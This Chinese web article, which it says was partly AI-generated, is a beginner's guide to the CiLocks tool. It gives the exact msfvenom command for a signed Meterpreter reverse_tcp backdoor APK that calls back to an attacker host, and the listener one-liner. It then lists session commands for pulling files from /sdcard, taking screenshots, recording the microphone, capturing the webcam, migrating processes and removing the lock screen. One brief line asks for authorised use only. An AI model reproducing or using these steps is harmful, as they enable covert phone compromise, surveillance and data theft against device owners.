新闻详情

新闻详情

首页 / 资讯中心 / 详情

CiLocks Meterpreter会话必备命令清单:从拿到Shell到执行操作的完整指南

发布时间:2026/9/27 9:23:22来源:尧图网络
CiLocks Meterpreter会话必备命令清单:从拿到Shell到执行操作的完整指南
CiLocks Meterpreter会话必备命令清单从拿到Shell到执行操作的完整指南【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocksCiLocks是一款集成 Metasploit 的 Android/IOS 锁屏破解工具支持 PIN 爆破、反锁屏绕过、ADB 工具箱以及一键启动reverse_tcp监听器。当你通过 CiLocks 拿到Meterpreter 会话后接下来该敲哪些命令本文整理了一份从拿到 Shell到执行操作的完整命令清单覆盖信息侦察、文件读写、会话管理与后渗透模块六大类新手照着敲即可上手。一、CiLocks 里 Meterpreter 会话是怎么来的CiLocks 的主脚本是 cilocks启动后进入主菜单选择10. Jump To Metasploit即可进入 Metasploit 子模块。运行前data/config 会自动检测系统是否安装了msfconsole缺失时会提示补装。整个流程被拆成 4 个功能菜单项作用关键命令1. Install Application通过 ADB 安装 APKadb installadb shell am start2. Create Payload Backdoor生成并签名的 Meterpreter 后门 APKmsfvenom -p android/meterpreter/reverse_tcp3. Run Metasploit启动监听器等待目标回连use exploit/multi/handler4. Inject Payload向已有 APK 注入 payloadmsfvenom --platform android -x后门文件统一输出到 backdoor/ 目录该目录内置了 wibu.apk 模板。二、三步拿到会话Payload → 后门APK → 回连第 1 步生成 payload。进入菜单 10 → 2输入 LHOST攻击机 IP与 LPORTCiLocks 会执行msfvenom -p android/meterpreter/reverse_tcp lhostIP lport端口 R backdoor/loli.apk随后自动用keytooljarsigner签名、zipalign对齐产物保存在backdoor/你起的名字.apk。第 2 步启动监听器。选择 10 → 3 → 1Multi Handler默认。CiLocks 会替你拼好一条自动化命令并在新终端执行msfconsole -x use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp ; set lhost IP ; set lport 端口; exploit第 3 步目标触发回连。让目标安装并运行后门 APK菜单 1 可自动adb install监听端出现Meterpreter session 1 opened即表示会话建立成功——本文剩余部分都在这条会话里进行。三、会话建立后的 Meterpreter 必备命令清单1. 侦察目标确认身份与设备信息命令作用getuid查看当前会话以哪个用户身份运行sysinfo查看设备型号、Android 版本、CPU 架构ps列出目标正在运行的进程pwd/cd查看/切换 Meterpreter 内部路径ifconfig查看 Meterpreter 会话的本地/远程 IP 与端口先跑这三条getuid、sysinfo、ps基本就能判断目标设备与权限层级。2. 会话管理多会话并行操作命令作用bg 1把 1 号会话转入后台jobs列出所有后台会话use 1切回 1 号会话foreground 1将指定会话拉回前台info查看当前会话详情kill 1关闭 1 号会话拿到多台目标时用bguse在多个meterpreter 之间切换不必逐个重连。3. 文件读写最实用的取数操作meterpreter ls /sdcard # 浏览目录 meterpreter cat /sdcard/notes.txt # 直接读取文本 meterpreter download /sdcard/a.jpg ./a.jpg # 拉取文件 meterpreter upload ./tool # 推送文件到目标 meterpreter mkdir /sdcard/tmp # 建目录拍照类应用的数据、聊天记录文件基本都在/sdcard下lsdownload是最高频的组合。4. 截屏与录音可视化取证命令说明screenshot /sdcard/shot.png截屏并写入目标存储再download取回record-mic ./rec.wav录音部分 ROM 无音频权限时会失败webcam_snapshot /sdcard/w.jpg部分设备支持远程拍摄像头Android 上最稳定的取证手段是screenshotdownload二连。5. 进程迁移让会话更稳migrate PID可把 Meterpreter 迁移到指定进程如系统级进程中运行降低被应用管理器杀掉的概率ps找到 PIDkill则结束指定进程。6. 后渗透模块一键移除锁屏CiLocks 把最常用的后渗透模块做成了快捷入口菜单 10 → 3 → 2/3直接绑定以下两个模块并自动填充 payload 参数post/android/manage/remove_lock—— 普通版移除锁屏post/android/manage/remove_lock_root—— Root 版移除锁屏在已建立的会话里也可以手动执行meterpreter run post/android/manage/remove_lock配合仓库中的 AntiGuard/src/io/kos/antiguard/unlock.java菜单 5 的反锁屏绕过应用CiLocks 覆盖了无 Root 爆破 → Root 移除 → 会话内移除的完整锁屏处理链路。四、常见问题与注意事项 ⚠️会话连不上reverse_tcp要求目标能主动回连攻击机请确认 LHOST 是目标可达的局域网 IP且防火墙放行了 LPORT。环境依赖需提前安装 ADB 与msfconsolesudo apt install msfconsole运行脚本需 root 权限sudo bash cilocks。仅限合法用途所有操作请只在自己拥有或已获书面授权的设备上进行仓库 README 中也有明确声明。掌握上面这份清单你就能从 CiLocks 建立的 Meterpreter 会话出发完成侦察 → 取数 → 稳定会话 → 后渗透的完整闭环命令不多但覆盖了日常 90% 的场景。【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

UVM Virtual Sequence机制详解:从单接口到系统级协同验证 2026/9/27 10:09:27

UVM Virtual Sequence机制详解:从单接口到系统级协同验证

做验证这几年,但凡接触过UVM,基本绕不开Sequence机制。很多刚入行的朋友能把uvm_do宏用得很溜,单个sequencer驱动一个agent也跑得顺,但一碰到系统级验证、多接口协同仿真的场景,就开始抓瞎了。这时候主角就不再是普通的…

阅读更多 →
厦门半匙星烘焙教室用预拌面团上曲奇课,学员还能学到什么? 2026/9/27 10:09:27

厦门半匙星烘焙教室用预拌面团上曲奇课,学员还能学到什么?

厦门半匙星烘焙教室用预拌面团上曲奇课,学员还能学到什么?厦门思明区莲坂附近的半匙星烘焙教室开设一节 100 分钟的黄油曲奇体验课。每位学员拿到的面团,已经由老师配料并搅拌完成;课上由学员擀面团、压模、烘烤和包装。原料称量、…

阅读更多 →
STM32 SBUS解析:IDLE中断+DMA循环模式实战指南 2026/9/27 10:09:20

STM32 SBUS解析:IDLE中断+DMA循环模式实战指南

1. 为什么SBUS解析不能只靠普通串口中断——从遥控器抖动说起我第一次在飞控项目里接SBUS信号时,用的是最常规的HAL_UART_Receive_IT方式。结果一上电,遥控器油门杆稍微一动,飞控就疯狂报“接收超时”、“帧校验失败”。当时以为是硬件接触不…

阅读更多 →
线下攻防 CTF 实战指南:Flag 提交、GameBox 监控与 Patch 防御操作全解 2026/9/27 10:09:13

线下攻防 CTF 实战指南:Flag 提交、GameBox 监控与 Patch 防御操作全解

文档网络安全教程 【免费下载链接】ctf-wiki Come and join us, we need you! 项目地址: https://gitcode.com/gh_mirrors/ct/ctf-wiki 点击查看 免费下载 线下攻防(Attack & Defense,AWD)是 CTF 线下决赛最常见的赛制&#…

阅读更多 →
wordpress采集小红书做SEO要多少钱才不踩坑 2026/9/27 10:09:13

wordpress采集小红书做SEO要多少钱才不踩坑

wordpress采集小红书做SEO要多少钱才不踩坑 找建站公司最怕啥?怕报价虚高,怕技术拉胯,更怕做完网站排名还是零。很多老板问wordpress采集小红书这种需求,到底 多少钱…

阅读更多 →
jose 中的 UnsecuredJWT:使用 `{ “alg“: “none“ }` 无签名 JWT 的编码、解码与校验指南 2026/9/27 10:09:06

jose 中的 UnsecuredJWT:使用 `{ “alg“: “none“ }` 无签名 JWT 的编码、解码与校验指南

网络安全认证鉴权后端 【免费下载链接】jose JWA, JWS, JWE, JWT, JWK, JWKS for Node.js, Browser, Cloudflare Workers, Deno, Bun, and other Web-interoperable runtimes 项目地址: https://gitcode.com/gh_mirrors/jo/jose 点击查看 免费下载 导读 Unsecured…

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞 ✉